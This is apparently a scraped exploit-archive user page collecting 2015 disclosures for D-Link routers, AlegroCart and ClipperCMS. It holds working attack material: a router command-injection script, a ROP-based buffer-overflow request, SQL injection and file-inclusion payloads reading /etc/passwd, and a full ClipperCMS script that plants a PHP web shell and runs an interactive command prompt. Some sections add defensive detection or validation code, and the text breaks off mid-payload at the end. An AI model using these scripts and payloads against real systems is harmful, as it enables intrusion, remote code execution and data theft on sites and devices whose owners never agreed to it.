
Everything posted by HireHackking
-
D-Link DIR-601 - Command Injection
## Advisory Information

Title: DIR-601 Command injection in ping functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (D-Link)
CVE: None

Note: All these security issues have been discussed with the vendor, and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 and http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has since taken the security advisory pages down, hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-601 -- Wireless N150 Home Router. Mainly used by homes and small offices.

## Vulnerabilities Summary

One security issue was found in the DIR-601 firmware: the ping functionality is vulnerable to command injection. The attacker needs to be logged in. Any attacker on the wireless LAN can then execute the attack, and so can an Internet attacker if the management interface is exposed on the Internet. XSRF can also be used to trick an administrator into triggering it.

## Details

Command injection in DIR-601

----------------------------------------------------------------------------------------------------------------------
import socket

# CMD_INJECTION_IN_PINGTEST
# Just need the user to be logged in and nothing else.
# The ping_test handler passes the request parameters to a shell unescaped,
# so the ';'-separated command carried in admin3_user_name runs on the router.
TARGET = "IP_ADDRESS"   # router address

body = ("request=ping_test"
        "&admin3_user_name=admin1;echo admin > /var/passwd1;test"
        "&admin4_user_pwd=admin2"
        "&user_type=0")

# Content-Length is derived from the body; the original PoC hard-coded 101
# for a 107-byte body.
buf = ("POST /my_cgi.cgi HTTP/1.0\r\n"
       "HOST: 192.168.1.8\r\n"
       "User-Agent: test\r\n"
       "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
       "Connection:keep-alive\r\n"
       "Accept-Encoding:gzip,deflate,sdch\r\n"
       "Accept-Language:en-US,en;q=0.8\r\n"
       "Content-Length:%d\r\n\r\n" % len(body))
buf += body + "\r\n\r\n"

print("[+] sending buffer size", len(buf))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, 80))
s.send(buf.encode())
s.close()
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by D-Link as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley.
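The request above is easy to spot on the wire once the body is parsed the way the router's CGI does. The following detection routine is an added example (not part of the advisory, and not D-Link code): it flags any ping_test POST to my_cgi.cgi whose parameters carry shell metacharacters. The two sample requests are constructed here; the first mirrors the PoC, the second is a legitimate ping of a host name.

```python
from urllib.parse import unquote_plus

# Shell metacharacters that never belong in a ping target or a user name.
SHELL_META = frozenset(";|&`$<>\n")


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only.

    Splitting on ';' as well (which older urllib.parse.parse_qs did by
    default) would cut the injected command out of the value and hide it.
    """
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def find_ping_injection(raw: bytes) -> list:
    """Return [(param, value), ...] for every ping_test parameter sent to
    my_cgi.cgi that contains a shell metacharacter; an empty list is clean.

    Content-Length is deliberately ignored and the whole body is inspected,
    so a declared length shorter than the body cannot hide trailing bytes.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, target = request_line.split(" ")[:2]
    if method != "POST" or not target.split("?")[0].endswith("/my_cgi.cgi"):
        return []
    params = parse_form_body(body.decode("latin-1").rstrip("\r\n"))
    if params.get("request") != ["ping_test"]:
        return []
    return [(name, value)
            for name, values in params.items()
            for value in values
            if any(ch in SHELL_META for ch in value)]


# Constructed sample traffic (not captured from a device).
INJECTED = (
    b"POST /my_cgi.cgi HTTP/1.0\r\nHOST: 192.168.1.8\r\nContent-Length: 107\r\n\r\n"
    b"request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test"
    b"&admin4_user_pwd=admin2&user_type=0\r\n\r\n"
)
BENIGN = (
    b"POST /my_cgi.cgi HTTP/1.0\r\nHOST: 192.168.1.8\r\nContent-Length: 82\r\n\r\n"
    b"request=ping_test&admin3_user_name=router.local&admin4_user_pwd=admin2&user_type=0\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, find_ping_injection(req))
```

The check keys on the request name rather than on a specific parameter because the advisory only shows admin3_user_name being used; any other field reaching the same shell would be caught the same way.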
-
D-Link DGL5500 - HNAP Buffer Overflow
## Advisory Information

Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (D-Link)
CVE: None

Note: All these security issues have been discussed with the vendor, and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 and http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has since taken the security advisory pages down, hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by homes and small offices.

## Vulnerabilities Summary

One security issue was found in the DGL5500 firmware which allows an attacker on the wireless LAN to exploit a buffer overflow in the HNAP functionality. It does not require any authentication and can be exploited from the WAN if the management interface is exposed.

## Details

# HNAP buffer overflow

----------------------------------------------------------------------------------------------------------------------
import socket
import sys

BUFFER_SIZE = 2048

# Although this URL can be reached unauthenticated on a WAN connection, which
# is great, a good shellcode is still needed.
# Buffer overflow in check_hnap_auth, triggered through the Cookie header.
buf = (b"POST /hnap.cgi HTTP/1.1\r\n"
       b"HOST: 10.0.0.90\r\n"
       b"User-Agent: test\r\n"
       b"Content-Length: 13\r\n"
       b"SOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\n"
       b"HNAP_AUTH: test\r\n"
       b"Cookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE")
buf += b"FFFF"
buf += b"AAAA"               # s0
buf += b"\x2A\xBF\xB9\xF4"   # s1 ROP 2
buf += b"\x2A\xC1\x3C\x30"   # s2 sleep address
buf += b"DDDD"               # s3
buf += b"\x2A\xC0\xEB\x50"   # s4 ROP 4 2AC0EB50
buf += b"\x2a\xc0\xf3\xe8"   # return address 2AC0F3E8, ROP 1
buf += b"XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG"   # 36 bytes of gap
buf += b"\x2A\xBC\xDB\xD0"   # ROP 3
buf += b"GGGGGGGGGGGGGGGG"
buf += b"AAAAAAAAAAAAAAAAAAAAA"   # Needs a proper shellcode. Bad chars: any byte 0x0? or 0x1? (high nibble 0 or 1)
buf += b"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"
buf += b"test=test\r\n\r\n"

print("[+] sending buffer size", len(buf))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print("received data:", data)
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by D-Link as per the email sent by the vendor.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley.
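The PoC stops short of a working payload because of the bad-character constraint it notes (any byte with a high nibble of 0 or 1). The helper below is an added example, not part of the advisory: it packs the PoC's gadget addresses as big-endian MIPS words, confirms none of them contains a bad byte, and scans candidate instruction words the same way. The two syscall encodings are constructed for illustration; `0x0101010c` is the `syscall 0x40404` form commonly used to avoid NUL bytes, and it fails this stricter filter too.

```python
import struct

# The PoC notes that bytes of the form 0x0? and 0x1? are bad characters,
# i.e. every byte value below 0x20.
BAD_BYTES = frozenset(range(0x20))

# Gadget addresses used by the PoC above (big-endian MIPS).
POC_GADGETS = {
    "rop1_return": 0x2AC0F3E8,
    "rop2_s1":     0x2ABFB9F4,
    "sleep_s2":    0x2AC13C30,
    "rop4_s4":     0x2AC0EB50,
    "rop3":        0x2ABCDBD0,
}


def pack_be(addr: int) -> bytes:
    """The 4 big-endian bytes that land in a saved-register slot on this MIPS target."""
    return struct.pack(">I", addr)


def bad_offsets(data: bytes) -> list:
    """Offsets of every bad byte in data; an empty list means data can be sent as-is."""
    return [i for i, b in enumerate(data) if b in BAD_BYTES]


def unusable_gadgets(gadgets: dict) -> list:
    """Names of gadgets whose packed address contains a bad byte."""
    return [name for name, addr in gadgets.items() if bad_offsets(pack_be(addr))]


def first_bad_instruction(code: bytes) -> int:
    """Index of the first 4-byte MIPS instruction in code that contains a bad byte, or -1."""
    for i in range(0, len(code) - len(code) % 4, 4):
        if bad_offsets(code[i:i + 4]):
            return i // 4
    return -1


# Constructed instruction words, not taken from any real shellcode.
SYSCALL_PLAIN = pack_be(0x0000000C)    # syscall
SYSCALL_NULFREE = pack_be(0x0101010C)  # syscall 0x40404: NUL-free, but 0x01 and 0x0c are still bad here
ADDIU_SP = pack_be(0x27BDFFE0)         # addiu $sp,$sp,-32: clean under this filter

if __name__ == "__main__":
    print("unusable gadgets:", unusable_gadgets(POC_GADGETS))
    print("first bad instruction:", first_bad_instruction(ADDIU_SP + SYSCALL_NULFREE))
```

Because even the system-call instruction cannot be sent verbatim, a payload for this bug has to produce such words at run time (for example through a decoder stub built only from clean bytes) rather than embed them.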
-
AlegroCart 1.2.8 - Multiple SQL Injections
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Patch Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There is a blind SQL injection in the admin area of AlegroCart. Additionally, there is a blind SQL injection when a customer purchases a product. Because of a required interaction with PayPal, this second injection is hard to exploit for an attacker.

3. Blind SQL Injection (Admin)

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When viewing the list of uploaded files (or images), the function check_download is called. This function performs a database query with the unsanitized name of the file. Because of this, an attacker can upload a file containing SQL code in its name, which will be executed once files are listed. Note that a similar function, check_filename, is called when deleting a file, making it likely that this operation is vulnerable as well. Admin credentials are required to exploit this issue.

Proof of Concept

POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865

-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"

test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg

img
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"

11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"

1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"

f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--

Visiting http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download will trigger the injected code.

Code

/upload/admin2/model/products/model_admin_download.php

function check_download($filename){
    $result = $this->database->getRow("select * from download where filename = '".$filename."'");
    return $result;
}

function check_filename($filename){
    $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
    return $results;
}

/upload/admin2/controller/download.php

function checkFiles() {
    $files=glob(DIR_DOWNLOAD.'*.*');
    if (!$files) {
        return;
    }
    foreach ($files as $file) {
        $pattern='/\.('.implode('|',$this->prohibited_types).')$/';
        $filename=basename($file);
        if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
            $result = $this->modelDownload->check_download($filename);
            if (!$result) {
                $this->init($filename);
            }
        }
    }
}

4. Blind SQL Injection (Customer)

CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL injection when using PayPal as a payment method during checkout. Please note that this injection requires that a successful interaction with PayPal took place. For test purposes, we commented out the parts of the code that actually perform this interaction with PayPal.

Proof of Concept

1. Register a user.
2. Buy an item, using PayPal as payment method; stop at the step "Checkout Confirmation".
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION

Note that this requires a valid PayPal tx token.

The injection can be exploited blind:

http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)

However, this is rather impractical, especially considering the need for a valid PayPal token for each request.

It is also possible with this injection to inject into an UPDATE statement in update_order_status_paidunconfirmed. The problem here is that it is difficult to create an injection that exploits the UPDATE statement but also results in an order_id being returned by the previous SELECT statement. It may also be possible to use the order_id that can be controlled via the SELECT statement to inject into the INSERT statement in update_order_history. But again, it is difficult to craft a query that does this but also returns a valid result for the UPDATE query.

Code

/upload/catalog/extension/payment/paypal.php:

function orderUpdate($status = 'final_order_status', $override = 0) {
    //Find the paid_unconfirmed status id
    $results = $this->getOrderStatusId('order_status_paid_unconfirmed');
    $paidUnconfirmedStatusId = $results?$results:0;
    //Find the final order status id
    $results = $this->getOrderStatusId($status);
    $finalStatusId = $results?$results:0;
    $reference = $this->request->get('ref');
    //Get Order Id
    $res = $this->modelPayment->get_order_id($reference);
    $order_id = $res['order_id'];
    //Update order only if state in paid unconfirmed OR override is set
    if ($order_id) {
        if ($override) {
            // Update order status
            $result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
            // Update order_history
            if ($result) {
                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
            }
        } else {
            // Update order status only if status is currently paid_unconfirmed
            $result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
            // Update order_history
            if ($result) {
                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
            }
        }
    }
}

/upload/catalog/model/payment/model_payment.php:

function get_order_id($reference){
    $result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
    return $result;
}

function update_order_history($order_id, $finalStatusId,$comment){
    $this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}

function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
    $result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
    return $result;
}

5. Solution

To mitigate this issue please apply this patch: http://forum.alegrocart.com/download/file.php?id=1040
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/17/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html
-
AlegroCart 1.2.8 - Local/Remote File Inclusion
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_22102015
Patch Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When retrieving logs, there are no checks on the given file_path parameter. Because of this, arbitrary local files can be read, or remote resources fetched, and the result is displayed to the user. Admin credentials are required to view logs.

3. Proof of Concept

Remote File:

POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 441

-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

http://localhost/shell.php
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-----------------------------16809437203643590021165278222--

Local File:

POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 425

-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

/etc/passwd
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-----------------------------16809437203643590021165278222--

For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack strings were still working:

http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd

4. Code

/upload/admin2/controller/report_logs.php

function get_file(){
    $file = '';
    if($this->request->gethtml('file_path', 'post')){
        $file = file_get_contents($this->request->gethtml('file_path', 'post'));
    }
    if($this->request->gethtml('decrytion', 'post')){
        $file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));
    }
    if($file){
        $file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file);
    }
    return $file;
}

5. Solution

To mitigate this issue please apply this patch: http://forum.alegrocart.com/download/file.php?id=1047
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html
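The two attack strings that survived the first patches show what a fix has to cover: a bare prefix check on the path is defeated by `..` segments, and `file_get_contents()` accepts URLs and stream wrappers as readily as files. The routine below is an added example, not AlegroCart code and not the vendor's patch: it resolves the `directory` and `file_path` fields to a path that must stay under an assumed log root (the path from the advisory's attack strings) and refuses anything else. The sample requests are constructed.

```python
import posixpath
from urllib.parse import urlsplit

# Log root as it appears in the advisory's attack strings (assumed location).
LOG_ROOT = "/var/www/ecommerce/AlegroCart_1.2.8/upload/logs"
ALLOWED_DIRS = frozenset({"error_log"})


def resolve_log_path(directory: str, file_path: str, root: str = LOG_ROOT) -> str:
    """Map the 'directory' and 'file_path' form fields to a path under root.

    Raises ValueError for anything file_get_contents() would otherwise open:
    remote URLs and PHP stream wrappers, NUL bytes, unknown log directories,
    absolute paths and '..' traversal.
    """
    if "\x00" in file_path or "\x00" in directory:
        raise ValueError("NUL byte in path")
    if urlsplit(file_path).scheme:
        # http://, ftp://, php://filter, data:, ... are all refused here.
        raise ValueError("URL scheme or stream wrapper rejected")
    if directory not in ALLOWED_DIRS:
        raise ValueError("unknown log directory")
    base = posixpath.normpath(posixpath.join(root, directory))
    candidate = posixpath.normpath(posixpath.join(base, file_path))
    # join() drops base for an absolute file_path and normpath() collapses
    # '..', so comparing the prefix after both is what actually confines us.
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the log directory")
    return candidate


def rejects(directory: str, file_path: str) -> bool:
    """True when resolve_log_path refuses the request."""
    try:
        resolve_log_path(directory, file_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed requests: one legitimate, the rest from the advisory's PoCs.
    for d, f in [("error_log", "error.log"),
                 ("error_log", "http://localhost/shell.php"),
                 ("error_log", "/etc/passwd"),
                 ("error_log", LOG_ROOT + "/error_log/../../../../../../../etc/passwd")]:
        print(f, "->", "rejected" if rejects(d, f) else resolve_log_path(d, f))
```

The scheme check is deliberately broad: any `name:` prefix is refused, because PHP's `php://`, `data:` and `phar://` wrappers are at least as dangerous as `http://` for a function that reads and echoes file contents.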
-
ClipperCMS 1.3.0 - Code Execution
#!/usr/bin/env python3
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com

import re
import sys

import requests  # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"


def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data=postData, headers={"referer": url})


def getFullPath(requestSession, url):
    # The file manager page embeds the absolute filesystem path of the upload directory.
    request = requestSession.get(url, headers={"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)


def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files=filesData, data=postData, headers={"referer": url})


def workingShell(url, fullPath):
    # Running `pwd` through the shell should echo the upload directory.
    return fullPath.strip("/") in requests.get(url + "pwd", headers={"referer": url}).text.strip("/")


def runShell(url):
    print("enter command, or enter exit to quit.")
    command = input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = input("$ ")


requestSession = requests.session()

loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)

fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)

# The .htaccess makes Apache run .png files in the upload directory as PHP.
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")

uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")

if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")

runShell(url + "404.png?x=")

# Blog Reference:
# http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
-
ClipperCMS 1.3.0 - Multiple SQL Injections
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities.

3. SQL Injection 1 (Blind)

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The id parameter of the web user editor is vulnerable to blind SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> true (the response is delayed)

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> false (the response is immediate)

Code

/manager/actions/mutate_web_user.dynamic.php

$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";

4. SQL Injection 2

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1

mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Code

/manager/processors/save_user_processor.php

$sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id";

5. SQL Injection 3

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameters are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

The proofs of concept for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameters are analogous to this PoC for gender:

POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1

mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
